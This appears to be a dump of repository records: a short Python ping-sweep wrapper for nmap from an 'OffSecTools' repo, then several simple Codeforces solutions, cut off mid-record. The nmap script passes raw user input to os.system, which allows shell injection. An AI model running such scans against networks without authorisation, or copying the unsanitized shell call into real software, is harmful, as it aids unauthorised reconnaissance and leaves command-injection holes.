old_stdout\\n')\n lines.append(' result_string = result.getvalue()\\n')\n lines.append(' messages.addMessage(result_string)\\n')\n lines.append(' return\\n\\n\\n')\n return lines\n\n\ndef define_tool_params(params):\n '''\n Generate function block for each tool parameter \n '''\n lines = []\n for param in params:\n items = params[param]\n if items['optional'] == 'false':\n parameter_type=\"Required\"\n else:\n parameter_type=\"Optional\"\n \n if 'NewFile' in items['parameter_type']:\n direction=\"Output\"\n else:\n direction=\"Input\"\n\n if param == \"class\": # parameter cannot use Python reserved keyword\n param = \"cls\"\n\n data_type = get_data_type(items['parameter_type'])\n\n # if data_type['multi_value'] and param == \"i\":\n # param = \"inputs\"\n\n if data_type['data_type'] == '\"DERasterDataset\"' and direction == \"Output\":\n data_type['data_type'] = '\"DEFile\"'\n data_type['data_filter'] = '[\"tif\"]'\n parameter_type = \"Required\" # if a filter is used, the parameter must be changed to required.\n elif data_type['data_type'] == '\"DERasterDataset\"' and direction == \"Input\":\n data_type['data_type'] = '\"GPRasterLayer\"'\n elif data_type['data_type'] == '\"DEShapefile\"' and direction == \"Input\":\n data_type['data_type'] = '\"GPFeatureLayer\"'\n elif data_type['data_type'] == '[\"DERasterDataset\", \"GPDouble\"]' and direction == \"Input\":\n data_type['data_type'] = '[\"GPRasterLayer\", \"GPDouble\"]'\n\n if data_type['data_filter'] == '[\"html\"]':\n parameter_type = \"Required\"\n\n lines.append(' {} = arcpy.Parameter(\\n'.format(param))\n lines.append(' displayName=\"{}\",\\n'.format(items['name']))\n lines.append(' name=\"{}\",\\n'.format(param))\n lines.append(' datatype={},\\n'.format(data_type['data_type']))\n lines.append(' parameterType=\"{}\",\\n'.format(parameter_type))\n lines.append(' direction=\"{}\")\\n'.format(direction))\n\n if data_type['multi_value']:\n lines.append(' {}.multiValue = True\\n'.format(param))\n\n if len(data_type['dependency_field']) > 0:\n lines.append(' {}.parameterDependencies = [{}.name]\\n'.format(param, data_type['dependency_field']).replace('input.name', 'i.name'))\n\n if data_type['data_filter'] != '[]':\n if 
data_type['filter_type'] == '\"ValueList\"':\n lines.append(' {}.filter.type = \"ValueList\"\\n'.format(param))\n\n if (data_type['data_filter'] in ['[\"Point\"]', '[\"Polyline\"]', '[\"Polygon\"]', '[\"las\", \"zip\"]']) and direction == \"Output\":\n pass\n else:\n lines.append(' {}.filter.list = {}\\n'.format(param, data_type['data_filter']))\n\n if (items['default_value'] != 'null') and (len(items['default_value']) > 0):\n if \"false\" in items['default_value']:\n items['default_value'] = False\n elif \"true\" in items['default_value']:\n items['default_value'] = True\n\n lines.append('\\n {}.value = {}\\n\\n'.format(param, items['default_value']))\n else:\n lines.append('\\n')\n \n line = ' params = [{}]\\n\\n'.format(', '.join(params)) \n if \"class\" in line:\n line = line.replace(\", class,\", \", cls,\")\n \n lines.append(line)\n lines = ''.join(lines)\n return lines\n\n\ndef define_execute(params):\n '''\n Accessing tool parameters\n '''\n lines = []\n for index, param in enumerate(params):\n # get the full path to a input raster or vector layer\n param_type = params[param]['parameter_type']\n inputRasVec = []\n inputRasVec.append({'ExistingFile': 'Raster'})\n # inputRasVec.append({'ExistingFileOrFloat': 'Raster'})\n inputRasVec.append({'ExistingFile': {'Vector': 'Point'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Line'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Polygon'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'LineOrPolygon'}})\n inputRasVec.append({'ExistingFile': {'Vector': 'Any'}})\n\n optional = False\n\n if \"optional\" in params[param].keys():\n if params[param]['optional'] == 'true':\n optional = True\n\n # deal with multi-value input\n items = params[param]\n data_type = get_data_type(items['parameter_type'])\n # if data_type['multi_value'] and param == 'i':\n # param = \"inputs\"\n\n if param == 'class':\n param = \"cls\"\n\n # deal with multi-value inputs\n lines.append(' {} = parameters[{}].valueAsText\\n'.format(param, index))\n if data_type['multi_value']:\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' items = {}.split(\";\")\\n'.format(param))\n lines.append(' items_path = []\\n')\n lines.append(' for item in items:\\n')\n lines.append(' items_path.append(arcpy.Describe(item).catalogPath)\\n')\n lines.append(' {} = \";\".join(items_path)\\n'.format(param))\n\n if param_type in inputRasVec:\n # lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n # lines.append(' {} = desc.catalogPath\\n'.format(param)) \n # if param_type == \"Optional\":\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n lines.append(' {} = desc.catalogPath\\n'.format(param)) \n elif param_type == {'ExistingFileOrFloat': 'Raster'}:\n lines.append(' if {} is not None:\\n'.format(param))\n lines.append(' try:\\n') \n lines.append(' {} = str(float({}))\\n'.format(param, param)) \n lines.append(' except:\\n') \n lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n lines.append(' {} = desc.catalogPath\\n'.format(param)) \n \n # lines.append(' if ({} is not None) and {}.isnumeric() == False:\\n'.format(param, param))\n\n # if param == \"cell_size\":\n # print(param)\n\n # if param_type in inputRasVec:\n # lines.append(' if {} is not None:\\n'.format(param))\n # lines.append(' desc = arcpy.Describe({})\\n'.format(param))\n # lines.append(' {} = desc.catalogPath\\n'.format(param)) \n # lines.append(' if (\".gdb\\\\\\\\\" in desc.catalogPath) or (\".mdb\\\\\\\\\" in 
desc.catalogPath):\\n') \n # lines.append(' arcpy.AddError(\"Datasets stored in a Geodatabase are not supported.\")\\n')\n # elif optional:\n # lines.append(' if {} is None:\\n'.format(param))\n # lines.append(' {} = None\\n'.format(param))\n\n\n lines = ''.join(lines) \n return lines\n\n\ndef get_data_type(param):\n '''\n Convert WhiteboxTools data types to ArcGIS data types\n '''\n data_type = '\"GPString\"' # default data type\n data_filter = '[]' # https://goo.gl/EaVNzg\n filter_type = '\"\"'\n multi_value = False\n dependency_field = ''\n\n # ArcGIS data types: https://goo.gl/95JtFu\n data_types = {\n 'Boolean': '\"GPBoolean\"',\n 'Integer': '\"GPLong\"',\n 'Float': '\"GPDouble\"',\n 'String': '\"GPString\"',\n 'StringOrNumber': '[\"GPString\", \"GPDouble\"]',\n 'Directory': '\"DEFolder\"',\n 'Raster': '\"DERasterDataset\"',\n 'Csv': '\"DEFile\"',\n 'Text': '\"DEFile\"',\n 'Html': '\"DEFile\"',\n 'Lidar': '\"DEFile\"',\n 'Vector': '\"DEShapefile\"',\n 'RasterAndVector': '[\"DERasterDataset\", \"DEShapefile\"]',\n 'ExistingFileOrFloat': '[\"DERasterDataset\", \"GPDouble\"]'\n\n }\n\n vector_filters = {\n 'Point': '[\"Point\"]',\n 'Points': '[\"Point\"]',\n 'Line': '[\"Polyline\"]',\n 'Lines': '[\"Polyline\"]',\n 'Polygon': '[\"Polygon\"]',\n 'Polygons': '[\"Polygon\"]',\n 'LineOrPolygon': '[\"Polyline\", \"Polygon\"]',\n 'Any': '[]'\n }\n\n if type(param) is str:\n data_type = data_types[param]\n\n else:\n for item in param:\n if item == 'FileList':\n multi_value = True\n elif item == 'OptionList':\n filter_type = '\"ValueList\"'\n data_filter = param[item]\n\n if param[item] == 'Csv':\n data_filter = '[\"csv\"]'\n elif param[item] == 'Lidar':\n data_filter = '[\"las\", \"zip\"]'\n elif param[item] == 'Html':\n data_filter = '[\"html\"]'\n\n if type(param[item]) is str:\n data_type = data_types[param[item]]\n elif type(param[item]) is dict:\n sub_item = param[item]\n for sub_sub_item in sub_item:\n data_type = data_types[sub_sub_item]\n if data_type == '\"DEShapefile\"':\n data_filter = vector_filters[sub_item[sub_sub_item]] \n elif item == 'VectorAttributeField':\n data_type = '\"Field\"'\n dependency_field = param[item][1].replace('--', '') \n else:\n data_type = '\"GPString\"'\n\n if param == {'ExistingFileOrFloat': 'Raster'}:\n data_type = '[\"DERasterDataset\", \"GPDouble\"]'\n\n ret = {}\n ret['data_type'] = data_type\n ret['data_filter'] = data_filter\n ret['filter_type'] = filter_type\n ret['multi_value'] = multi_value\n ret['dependency_field'] = dependency_field\n\n return ret\n\n\ndef get_github_url(tool_name, category):\n '''\n Generate source code link on Github \n ''' \n # prefix = \"https://github.com/jblindsay/whitebox-tools/blob/master/src/tools\"\n url = wbt.view_code(tool_name).strip()\n # url = \"{}/{}/{}.rs\".format(prefix, category, tool_name)\n return url\n\n\ndef get_github_tag(tool_name, category):\n '''\n Get GitHub HTML tag\n ''' \n # prefix = \"https://github.com/jblindsay/whitebox-tools/blob/master/src/tools\"\n # url = \"{}/{}/{}.rs\".format(prefix, category, tool_name)\n url = wbt.view_code(tool_name).strip()\n # print(tool_name)\n # if tool_name == \"split_vector_lines\":\n # print(url)\n if \"RUST_BACKTRACE\" in url:\n url = \"https://github.com/jblindsay/whitebox-tools/tree/master/whitebox-tools-app/src/tools\"\n html_tag = \"<a href='{}' target='_blank'>GitHub</a>\".format(url)\n return html_tag\n\n\ndef get_book_url(tool_name, category):\n '''\n Get link to WhiteboxTools User Mannual \n ''' \n prefix = 
\"https://jblindsay.github.io/wbt_book/available_tools\"\n url = \"{}/{}.html#{}\".format(prefix, category, tool_name)\n return url\n \n\n\ndef get_book_tag(tool_name, category):\n '''\n Get User Manual HTML tag\n ''' \n prefix = \"https://jblindsay.github.io/wbt_book/available_tools\"\n url = \"{}/{}.html#{}\".format(prefix, category, tool_name)\n html_tag = \"<a href='{}' target='_blank'>WhiteboxTools User Manual</a>\".format(url)\n return html_tag\n\n\ndir_path = os.path.dirname(os.path.realpath(__file__))\nwbt_dir = os.path.dirname(dir_path)\nroot_dir = os.path.dirname(wbt_dir)\nwbt_win_zip = os.path.join(root_dir, \"WhiteboxTools_win_amd64.zip\")\n\n# wbt_py = os.path.join(dir_path, \"whitebox_tools.py\")\nwbt_py = os.path.join(wbt_dir, \"whitebox_tools.py\")\n\nfile_header_py = os.path.join(dir_path, \"file_header.py\")\nfile_toolbox_py = os.path.join(dir_path, \"file_toolbox.py\")\nfile_tool_py = os.path.join(dir_path, \"file_tool.py\")\nfile_about_py = os.path.join(dir_path, \"file_about.py\")\n\nfile_wbt_py = os.path.join(dir_path, \"WhiteboxTools.py\")\nfile_wbt_pyt = os.path.join(os.path.dirname(os.path.dirname(dir_path)), \"WhiteboxTools.pyt\")\n\nif not os.path.exists(wbt_win_zip):\n print(\"Downloading WhiteboxTools binary ...\")\n url = \"https://www.whiteboxgeo.com/WBT_Windows/WhiteboxTools_win_amd64.zip\"\n urllib.request.urlretrieve(url, wbt_win_zip) # Download WhiteboxTools\nelse:\n print(\"WhiteboxTools binary already exists.\")\n\nprint(\"Decompressing WhiteboxTools_win_amd64.zip ...\")\nwith ZipFile(wbt_win_zip, 'r') as zipObj:\n # Extract all the contents of zip file to the root directory\n zipObj.extractall(root_dir)\n\nMACOSX = os.path.join(root_dir, \"__MACOSX\")\nif os.path.exists(MACOSX):\n shutil.rmtree(MACOSX)\n\ntoolboxes = {\n \"# Data Tools #\": \"Data Tools\",\n \"# GIS Analysis #\": \"GIS Analysis\",\n \"# Geomorphometric Analysis #\": \"Geomorphometric Analysis\",\n \"# Hydrological Analysis #\": \"Hydrological Analysis\",\n \"# Image Processing Tools #\": \"Image Processing Tools\",\n \"# LiDAR Tools #\": \"LiDAR Tools\",\n \"# Math and Stats Tools #\": \"Math and Stats Tools\",\n \"# Precision Agriculture #\": \"Precision Agriculture\",\n \"# Stream Network Analysis #\": \"Stream Network Analysis\"\n}\n\ngithub_cls = {\n \"Data Tools\": \"data_tools\",\n \"GIS Analysis\": \"gis_analysis\",\n \"Geomorphometric Analysis\": \"terrain_analysis\",\n \"Hydrological Analysis\": \"hydro_analysis\",\n \"Image Processing Tools\": \"image_analysis\",\n \"LiDAR Tools\": \"lidar_analysis\",\n \"Math and Stats Tools\": \"math_stat_analysis\",\n \"Precision Agriculture\": \"precision_agriculture\",\n \"Stream Network Analysis\": \"stream_network_analysis\"\n}\n\nbook_cls = {\n \"Data Tools\": \"data_tools\",\n \"GIS Analysis\": \"gis_analysis\",\n \"Geomorphometric Analysis\": \"geomorphometric_analysis\",\n \"Hydrological Analysis\": \"hydrological_analysis\",\n \"Image Processing Tools\": \"image_processing_tools\",\n \"LiDAR Tools\": \"lidar_tools\",\n \"Math and Stats Tools\": \"mathand_stats_tools\",\n \"Precision Agriculture\": \"precision_agriculture\",\n \"Stream Network Analysis\": \"stream_network_analysis\"\n}\n\n\n\n\n\ntools_dict = {}\ntool_labels = []\ncategory = ''\n\ntool_index = 1\n\nwith open(wbt_py) as f:\n lines = f.readlines()\n\n for index, line in enumerate(lines):\n if index > 360: \n line = line.strip()\n\n if line in toolboxes:\n category = toolboxes[line]\n \n if line.startswith(\"def\"):\n func_title = line.replace(\"def\", \"\", 
1).strip().split(\"(\")[0]\n func_name = to_camelcase(func_title)\n\n func_label = to_label(func_title)\n tool_labels.append(func_label)\n func_desc = lines[index+1].replace('\"\"\"', '').strip()\n\n \n github_tag = get_github_tag(func_title, github_cls[category])\n book_tag = get_book_tag(func_name, book_cls[category])\n full_desc = \"{} View detailed help documentation on {} and source code on {}.\".format(func_desc, book_tag, github_tag)\n\n func_dict = {}\n func_dict['name'] = func_name\n func_dict[\"category\"] = category\n func_dict[\"label\"] = func_label\n func_dict[\"description\"] = full_desc\n \n tool_index = tool_index + 1\n func_params = get_tool_params(func_name)\n func_dict[\"parameters\"] = func_params\n tools_dict[func_name] = func_dict\n\nwrite_header(file_header_py, tool_labels)\n\nf_wbt = open(file_wbt_py, \"w\")\n\n# write toolbox header\nwith open(file_header_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\n# write toolbox class\nwith open(file_toolbox_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\n# write tool class\nfor tool_name in tools_dict.keys():\n f_wbt.write(\" tools.append({})\\n\".format(tool_name))\nf_wbt.write(\"\\n self.tools = tools\\n\\n\\n\")\n\nwith open(file_about_py) as f:\n lines = f.readlines()\n f_wbt.writelines(lines)\n\nfor tool_name in tools_dict:\n lines = generate_tool_template(tools_dict[tool_name])\n f_wbt.writelines(lines)\n\nf_wbt.close()\n\n# copy WhiteboxTools.py to WhiteboxTool.pyt (final ArcGIS Python Toolbox)\nif os.path.exists(file_wbt_pyt):\n os.remove(file_wbt_pyt)\n shutil.copyfile(file_wbt_py, file_wbt_pyt)"
}
] | 1 |
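The automation record above converts between WhiteboxTools' CamelCase tool names and snake_case Python wrapper names with a two-pass regex. A minimal standalone sketch of that same conversion (helper names mirror the record's to_snakecase/to_camelcase; the sample tool name 'BreachDepressions' is an assumed illustration, not taken from the record):

import re

def to_snakecase(name):
    # pass 1: split before a capitalized word ("BreachDepressions" -> "Breach_Depressions")
    s1 = re.sub('(.)([A-Z][a-z]+)', r'\1_\2', name)
    # pass 2: split a lowercase letter or digit followed by an uppercase letter, then lowercase all
    return re.sub('([a-z0-9])([A-Z])', r'\1_\2', s1).lower()

def to_camelcase(name):
    # title-case each underscore-separated chunk and rejoin
    return ''.join(x.title() for x in name.split('_'))

# round trip on the assumed tool name
assert to_snakecase('BreachDepressions') == 'breach_depressions'
assert to_camelcase('breach_depressions') == 'BreachDepressions'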
leveryd/OffSecTools
|
https://github.com/leveryd/OffSecTools
|
570e62beac4b7d24241e2a477078157004500826
|
2b5fa4d0393f5a51974216ac4b2bd54a9ed5b17a
|
f13b34c56ec7b7f39d24e96ae464ae49a54af0cf
|
refs/heads/master
| 2021-01-15T21:14:15.104206 | 2015-05-01T15:32:16 | 2015-05-01T15:32:16 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5587044358253479,
"alphanum_fraction": 0.6153846383094788,
"avg_line_length": 16.714284896850586,
"blob_id": "07a6a63e187a72dd16fd8f2bccf35a1ba4c75038",
"content_id": "a0515e96155389142c4490345c0ec1b2d530b403",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 247,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 14,
"path": "/null_ping.py",
"repo_name": "leveryd/OffSecTools",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n__author__ = 'admanne'\nimport sys\nimport os\n\nif len(sys.argv) != 2:\n print \"null_ping <range>\"\n print \"null_ping 192.168.1.1-255\"\n sys.exit(0)\n\naddr = sys.argv[1].strip()\n\ncmd = 'nmap -sP ' + str(addr)\nos.system(cmd)"
}
] | 1 |
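null_ping.py above builds its nmap command by string concatenation and runs it through os.system, so the user-supplied range is parsed by a shell. A hedged Python 3 alternative (a sketch, not part of the repo) passes nmap an argument list via subprocess, which skips the shell entirely; -sn is assumed here as the current spelling of the deprecated -sP ping scan:

import subprocess
import sys

if len(sys.argv) != 2:
    print("null_ping <range>")
    print("null_ping 192.168.1.1-255")
    sys.exit(0)

addr = sys.argv[1].strip()
# each list element reaches nmap verbatim; no shell parsing happens
subprocess.run(["nmap", "-sn", addr], check=False)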
victor-soto/codeforces
|
https://github.com/victor-soto/codeforces
|
8a375a1b3844f4468ddcc33d48800f6dd6f825d8
|
77f092488085db895b7be2c463d10a88e5bf44a6
|
f0272fe171256422382d8858106b32137db3ad53
|
refs/heads/master
| 2023-03-20T02:18:49.845977 | 2021-03-15T22:42:38 | 2021-03-15T22:42:47 | 272,117,365 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6510416865348816,
"alphanum_fraction": 0.6614583134651184,
"avg_line_length": 18.25,
"blob_id": "55a11a07d31c095c70fb904690f5bbd46ef78fd2",
"content_id": "3ad13b2edbb3c94892c17dcb06ad594efbbebb59",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 384,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 20,
"path": "/tram.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/116/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn=inp()\nlines=read_lines(n)\nstops=[]\nfor i in range(n):\n a,b=map(int,lines[i].split())\n if len(stops):\n stops.append(stops[i-1]-a+b)\n else:\n stops.append(b)\nprint(max(stops))"
},
{
"alpha_fraction": 0.6105263233184814,
"alphanum_fraction": 0.6631578803062439,
"avg_line_length": 23,
"blob_id": "538ceb5ac2b7a8be0bf0c0c519b1639820565572",
"content_id": "2325bcb11556877e3dc6fd9c7bc00cfed811711a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 4,
"path": "/word_capitalization.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/281/A\n\nn = input()\nprint(n[0].upper() + n[1:len(n)])"
},
{
"alpha_fraction": 0.6489361524581909,
"alphanum_fraction": 0.6808510422706604,
"avg_line_length": 30.33333396911621,
"blob_id": "4b6f05e00e2be5aa7a610c6d0fccdfa4f9f95f33",
"content_id": "f00c6097bb845f504c8c17ce5f9d0af6c7dfc624",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 94,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/helpful_maths.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/339/A\n\nprint('+'.join(sorted(input().split('+'))))\n"
},
{
"alpha_fraction": 0.6342592835426331,
"alphanum_fraction": 0.6620370149612427,
"avg_line_length": 23.11111068725586,
"blob_id": "cbd382a10d24a71d56d3eaf38505fe7a3226f8db",
"content_id": "55bacecdac0fc68ba4753da63b34fefd41247b76",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 216,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 9,
"path": "/next_round.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/158/A\n\ndef inlt():\n return(list(map(int,input().split())))\n\nn = inlt()\nparticipants = inlt()\n\nprint(len([x for x in participants if x >= participants[n[1]-1] and x > 0]))"
},
{
"alpha_fraction": 0.6100917458534241,
"alphanum_fraction": 0.642201840877533,
"avg_line_length": 17.16666603088379,
"blob_id": "85763adb59ddf8a64ff4c2853fb3c8dac4587eef",
"content_id": "35417a173c6e4016421961abe817c5ca1901c98e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 218,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 12,
"path": "/stones_on_the_table.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/266/A\n\nn=int(input())\ns=input()\nreplacements = 0\npivot = s[0]\nfor i in range(1,len(s)):\n if pivot == s[i]:\n replacements += 1\n else:\n pivot = s[i]\nprint(replacements)\n"
},
{
"alpha_fraction": 0.5838926434516907,
"alphanum_fraction": 0.6308724880218506,
"avg_line_length": 20.428571701049805,
"blob_id": "7a59c6577aa7f34837781d1a81370203fb870381",
"content_id": "1db929e7b64c886ba89dfab4cd49c0c21edcbaf8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 149,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 7,
"path": "/bitpp.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/282/A\ntotal = 0\n\nfor _ in [0]*int(input()):\n total = total + (1 if '++' in input() else -1)\n\nprint(total)"
},
{
"alpha_fraction": 0.49187934398651123,
"alphanum_fraction": 0.5313224792480469,
"avg_line_length": 18.590909957885742,
"blob_id": "33566558c51a2b97da2bdc11e37ea28f686128f4",
"content_id": "a1ddfba08e03d8ed6ac8eca1558be2fa9191bd6b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 22,
"path": "/queue_at_the_school.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/266/B\nimport sys\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\ninp = read_lines(2)\nc = inp[0].split(' ')[0]\nt = int(inp[0].split(' ')[1])\nqueue = list(inp[1])\n\nwhile t > 0:\n i = 0\n while i < len(queue) - 1:\n if queue[i] == 'B' and queue[i+1] == 'G':\n queue[i] = 'G'\n queue[i+1] = 'B'\n i += 1\n i += 1\n t -= 1\n\nprint(''.join(queue))\n"
},
{
"alpha_fraction": 0.652482271194458,
"alphanum_fraction": 0.673758864402771,
"avg_line_length": 25.5,
"blob_id": "e7cf129369da8c5f9c35c3271e9ca8579b0de974",
"content_id": "11ba1c923fdc50bceddf1130db800689796d91bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 423,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 16,
"path": "/way_too_long_words.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/71/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn = inp()\nlines = read_lines(n)\nformatted_lines = []\nfor line in lines:\n formatted_lines.append(line[0] + str(len(line[1:len(line)-2])+1) + line[len(line)-1] if len(line) > 10 else line)\nprint(*formatted_lines, sep = \"\\n\")"
},
{
"alpha_fraction": 0.540145993232727,
"alphanum_fraction": 0.6058394312858582,
"avg_line_length": 14.222222328186035,
"blob_id": "59cba27d1a571b1533363b5765c96afe07eee35b",
"content_id": "7ae9b3a6de8318618c42b1916f8724c164e4c438",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 137,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 9,
"path": "/bear_and_big_brother.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/791/A\nn=input().split()\na,b=int(n[0]),int(n[1])\nc=0\nwhile a<=b:\n a*=3\n b*=2\n c+=1\nprint(c)\n"
},
{
"alpha_fraction": 0.6388888955116272,
"alphanum_fraction": 0.6759259104728699,
"avg_line_length": 35,
"blob_id": "9ca8bb6ff26c03c0a41155bd7c75e28839598b56",
"content_id": "7437a4c47d0828fc7a44d589af751d22739f6e9b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 9,
"path": "/beautiful_matrix.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/263/A\nimport sys\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nlines = read_lines(5)\npositions = [(index, row.index('1')) for index, row in enumerate([x.split() for x in lines]) if '1' in row]\nprint(abs(2-positions[0][0]) + abs(2-positions[0][1]))\n"
},
{
"alpha_fraction": 0.6225489974021912,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 24.5,
"blob_id": "ac75310fa49b7fb247d82092e6232dd9306007d5",
"content_id": "c90985695a1b7f53b51313b38ad01285906f3302",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 204,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 8,
"path": "/word.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/59/A\n\nn = input()\narr = []\nfor i in n:\n arr.append(i.isupper())\n\nprint(n.upper() if len([a for a in arr if a]) > len([a for a in arr if not a]) else n.lower())\n"
},
{
"alpha_fraction": 0.5533333420753479,
"alphanum_fraction": 0.6200000047683716,
"avg_line_length": 24,
"blob_id": "096004bd318115613e9d1bf4e5d82a8267b86588",
"content_id": "a5c867e9dbf4e5f47ca52e55613c065474d1bb8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 150,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 6,
"path": "/soldier_and_bananas.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/546/A\n\ni=input().split()\nk,n,w=int(i[0]),int(i[1]),int(i[2])\nr=int(k*(w*(w+1)/2))-n\nprint(r if r>0 else 0)\n"
},
{
"alpha_fraction": 0.5602836608886719,
"alphanum_fraction": 0.609929084777832,
"avg_line_length": 46,
"blob_id": "3854f457e5b13ac0e280010918284b00085472e3",
"content_id": "5ae214f8b94d31bea5b12acdbaa501eecc057fd3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 141,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 3,
"path": "/nearly_lucky_number.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/110/A\n\nprint('YES' if len([x for x in list(input()) if x == '4' or x == '7']) in [4,7] else 'NO')\n"
},
{
"alpha_fraction": 0.5858585834503174,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 32,
"blob_id": "4085dcb6c587facdc6ea1757dbae322eae1624c5",
"content_id": "dba1fd0036ceedbc671c7a02db82e58222865ce7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 99,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 3,
"path": "/elephant.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/617/A\nn=int(input())\nprint(n//5 + (0 if n%5==0 else 1))\n"
},
{
"alpha_fraction": 0.6336336135864258,
"alphanum_fraction": 0.6516516804695129,
"avg_line_length": 40.625,
"blob_id": "9807683216388f14e0f78664772a9c70417422ec",
"content_id": "571452c534388e86f0be76bac439af387734faef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 333,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 8,
"path": "/petya_and_strings.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/112/A\nfirst, second = input(), input()\nif first.lower() == second.lower():\n print(0)\nelse:\n first, second = first.lower(), second.lower()\n pos = next((i for i in range(len(first)) if first[i].lower() != second[i].lower()) , None)\n print(-1 if ord(first[pos]) < ord(second[pos]) else 1)\n"
},
{
"alpha_fraction": 0.6220930218696594,
"alphanum_fraction": 0.6424418687820435,
"avg_line_length": 17.157894134521484,
"blob_id": "14d2e057674f6821fa02a2cb95bc9f4f41cbc437",
"content_id": "d552239f86493e5c596601f61c03fff7ed332ae5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 344,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 19,
"path": "/team.py",
"repo_name": "victor-soto/codeforces",
"src_encoding": "UTF-8",
"text": "#https://codeforces.com/problemset/problem/231/A\nimport sys\ninput = sys.stdin.readline\n\ndef inp():\n return(int(input()))\n\ndef read_lines(n):\n return [sys.stdin.readline().strip() for _ in range(n)]\n\nn = inp()\nlines = read_lines(n)\ntotal = 0\n\nfor line in lines:\n if len([x for x in line.split() if x == '1']) > 1:\n total += 1\n\nprint(total)"
},
{
"alpha_fraction": 0.6371307969093323,
"alphanum_fraction": 0.6624472737312317,
"avg_line_length": 22.799999237060547,
"blob_id": "117305c088d4be6b297c9f57a002d13c694e9987",
"content_id": "662054a55655e0952622665af8847d52fafa52bf",
"detected_licenses": [],
"is_generated": false,
